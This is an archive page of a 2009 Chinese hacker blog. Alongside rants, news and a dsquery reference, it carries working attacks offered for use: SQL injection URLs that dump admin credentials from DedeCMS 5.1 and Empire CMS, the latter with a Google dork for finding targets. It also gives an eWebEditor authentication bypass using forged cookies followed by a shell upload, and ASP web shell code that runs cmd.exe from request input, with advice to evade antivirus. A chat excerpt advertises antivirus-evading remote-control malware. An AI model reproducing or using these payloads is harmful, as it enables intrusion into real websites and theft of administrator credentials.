Technology → 哎哎。改变改变BLOG性质
十二月 8th, 2009 by admin
以前BLOG总是以技术为主
但是发现 没有更多的时间去转载或者写技术类文章
BLOG并不是完全的技术发表平台
所以
以后BLOG还是当成自己的空间
没事的时候
上来写写心情 发发牢骚还是好的。。。
Archive for the ‘Technology’ Category
Technology → Www.U6sec.Com开放
十二月 2nd, 2009 by admin
Www.U6sec.Com
开放了
主要是提供一个交流的平台..
当然 针对不同的环境和人群 也有不同的隐藏内容…
Technology → Dsquery 命令详解
十一月 27th, 2009 by admin
| Dsquery computer | Finds computers in the directory that match search criteria that you specify. |
| Dsquery contact | Finds contacts in the directory that match search criteria that you specify. |
| Dsquery group | Finds groups in the directory that match search criteria that you specify. If the predefined search criteria in this command are insufficient, use the general version of the query command, dsquery *. |
| Dsquery ou | Finds organizational units (OUs) in the directory that match search criteria that you specify. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery site | Finds sites in the directory that match search criteria that you specify. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery server | Finds domain controllers according to specified search criteria. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery user | Finds users in the directory that match search criteria that you specify. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery quota | Finds quota specifications in the directory that match search criteria that you specify. A quota specification determines the maximum number of directory objects a specified security principal can own in a given directory partition. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery partition | Finds partition objects in the directory that match search criteria that you specify. If the predefined search criteria in this command are insufficient, use the more general version of the query command, dsquery *. |
| Dsquery | Finds any objects in the directory according to criteria using an LDAP query. |
Dsquery Computer: (全文…)
Technology → 传闻暗组–NEW4骗钱
十一月 14th, 2009 by admin
和NEW4不是很熟 没啥交情
不过跟狼总就熟了。U6必顶。
————————————————————————————–
堂堂暗组NEW4 都骗钱 可笑
这个是10-28的谈话
————————————
Sid Vicious 23:26:06
你们暗组不是有款远控么
Dark-D.S.T 23:26:41
嗯
Sid Vicious 23:28:06
MB 不出个VIP版?
Dark-D.S.T 23:28:42
有1200的
Sid Vicious 23:28:49
那么贵 日
Sid Vicious 23:32:09
你那里是不是真有卖啊
Dark-D.S.T 23:32:24
有的
Dark-D.S.T 23:32:35
1200 是第一次费用
Dark-D.S.T 23:32:53
以后每次升级免杀或者换版本 100的
Sid Vicious 23:33:08
升级免杀还要给钱?
Sid Vicious 23:33:21
我靠 那如果一个星期升级 3 4次免杀不得给300 400啊
Dark-D.S.T 23:33:30
单独编译的
Dark-D.S.T 23:44:36
特供版(价格视功能商议):采用0day启动项、无特征复制、文件自锁加固、函数动态加密、反虚拟机等技术完美通过国外顶级小红伞、及卡巴等杀毒软件。[该版本仅限于安全公司合作项目不对个人出售]
(全文…)
Technology → 关于内网渗透一点小笔记
十一月 4th, 2009 by admin
内网渗透
这只是给自己一点小笔记,没有什么技术类大放送。纯粹给新手一点参考,如果是老手,就绕过吧。
相对来说 网上的资料少之又少 很少有人对内网渗透写出一些详细的资料以供同行们参考
今天在这 只是大致的讲一下内网的一些知识。
首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了。但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题。
在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,毕竟没有经过尝试,我们也不知道里面的结构,至少在外部上我们可以获取一定的信息也说不定,但是对于内网,外网绝对不是我们的主要路径。很多时候我们直接从外网入手,想进入内网,已变得越来越困难。
那面对内网,我们应该怎样做呢?有些什么可利用的?或者有些什么方法?下面,我们就来一起讨论下。
渗透,本身就是一个信息收集,然后分类归档,技术利用,从而达到目标。
那我们拿到一个内网的机器时,我们首要要做的事情就是要进入信息的收集,什么信息?很多。。。 (全文…)
Technology → DEDECMS 5.1 GBK SQL INJECTION
十月 11th, 2009 by admin
今天RAINY说他有了新的DEDE 注射漏洞
不过还存在一点小问题
经过测试 确定可用
特此作者说共享
————————————————
发现者:Rainy'Fox&St0p
Tems:二胖子网安(http://bbs.erpangzi.com)
影响版本:
dedecms GBK 5.1
漏洞描述:
文件:plus/feedback_js.php
if(empty($arcID))
{
$row = $dlist->dsql->GetOne(“Select id From `#@__cache_feedbackurl` where url='$arcurl' “);
if(is_array($row)) $urlindex = $row['id'];
}
获得变量arcurl,直接放入数据库查询.导致注入产生,介于对于php环境如果设置了magic_quote_gpc=on的问题.可以结合php多字节编码漏洞构造.
利用地址:
http://localhost/plus/feedback_js.php?arcurl=%cf' union select “' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback d where 1=2 and ''='” from dede_admin where ''='
经过测试,得出结论,magic_quotes_gpc = On的时候目前语句还不行,编码尚未突破
Technology → 百度已变成拖欠工资的包工头
九月 16th, 2009 by admin
本人也做百度AD
目前 已经9-16 可是百度联盟的钱依然显示未付款
对此 百度官方也没有任何官方说明
这对于大部分站长来说 是件拖欠工资的事实
作为一个大公司 是不应该出现这样的事情
以下是一些网站的新闻播报
——————————-
9月16日消息,因百度联盟延迟8月佣金支付,站长们集体到百度联盟贴吧爆吧,要求百度尽快发放应付款项。目前,联盟对此事件进行回应:“联盟正在陆续为用户安排支付8月佣金,待佣金支付完毕后,我们会发送首页公告、站内消息及邮件请大家,期间还请耐心等待。”
百度联盟贴吧部分截图:
|
以下为引用的内容: 大家好: 联盟承诺佣金支付周期为每月15-25日,此期间佣金到账都属于联盟承诺期限内,请大家了解。 相关内容请参看:http://help.union.baidu.com/client/9/8/23.html 目前,联盟正在陆续为用户安排支付8月佣金,待佣金支付完毕后,我们会发送首页公告、站内消息及邮件请大家,期间还请耐心等待。 请注意:我们会按时为会员支付佣金,请大家放心,今后此类问题我们将不再予以答复,若有会员恶意发帖、顶贴或违反联盟吧发帖规则的行为,我们将会予以删帖处理,谢谢! |
Technology → 短句
九月 5th, 2009 by admin
巨大财富的背后,都隐藏着罪恶。
让朋友低估你的优点,让敌人高估你的缺点。
不要憎恨你的敌人,那会影响你的判断力
离你的朋友近些,但离你的敌人要更近,这样你才能更了解他。
Technology → 华夏–绿坝 查封
七月 14th, 2009 by admin
华夏黑客同盟(77169)于北京时间2009年7月14日16:38,十多名警察进入华夏黑客联盟, 因涉嫌破解绿坝、被请去调查(暂不清楚是否参与其它入侵问题,因为他们同时还经营了黑客培训,服务租用,免杀空间,等IDC业务,我将继续就此问题进行跟踪)。
华夏负责人怪狗被警察带走(截止19:30分未能接通电话),公司所有员工被盘问、并拍照,所有硬盘拆下带回调查。
据说华夏黑客联盟网站所在机房的工作人员已确认本消息。
华夏就这样被抄掉了。
仅仅是涉嫌破解驴霸。国家确实加强了。以破解软件为由进行调查,再加上黑客培训 等等罪名将华夏查封。
看上去不过是很正常的网络安全案件。但是主角是驴霸。如果换作另外的软件。就不是这样的结局了。
破解驴霸为犯法,不知道驴霸抄袭他人是否犯法?驴霸用的是纳税人的钱,还生产一些漏洞让纳税人的电脑沦为肉鸡,给别人赚钱,驴霸真是数钱数到手抽筋啊。
一个黑客网站关了,无所谓,国内还有很多。但是当所有黑客网站关闭的时候,国内安全靠谁?
那些所谓的吃着纳税人钱的所谓安全公司?
除了做一些无谓的事情来骗取纳税人的钱,还能做到什么?
哪个真正的安全公司不需要黑盒 白盒 的测试?
少了安全相关网站。你们吃什么?
驴霸能不能真正杜绝青少年上网坏习惯我不清楚。我只知道。驴霸。只是个小小的护航软件。它没什么了不起。除了他能骗取纳税人一年4000万的钱。它真的没什么了不起。
它代表不了中国的安全。它甚至连一个杀毒软件都不是。
在出驴霸的时候。不知道工信部有没有考虑过出了这玩意的后果。不知道你们在想什么。
一个小学生都能破解的软件。成为了我国的护航代表。真是侮辱了国人的智商。侮辱了国人的安全意识。我汗。
不写了。
不要为了驴霸。而被河蟹了。
Technology → 没有Wscript.shell组件提权我们该怎么办呢?
七月 10th, 2009 by admin
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<%
end if
response.write(””)
On Error Resume Next
response.write oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
response.write(””)
response.write(””)
response.write(”
“)
response.write(””)
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行
无wscript.shell组件提权又一个方法
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″>
<%if err then%>
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”>
<%
end if
response.write(”rows=20>”)
On Error Resume Next
response.write
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
response.write(””)
response.write(”
response.write(”
size=60>
”)
response.write(”
value=’执行’>
”)
%>
保存为ASP,此代码可能被杀,请注意免杀。
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
Technology → 帝国CMS0day
七月 10th, 2009 by admin
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1,然后依照上面方式留言,显示结果即爆出管理员帐号和密码md5值,破解密码登陆后台。
Technology → ewebeditor后台通杀漏洞
七月 10th, 2009 by admin
今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
哈哈,以后只要ewebeditor的后台可以找到的话,就可以通杀了
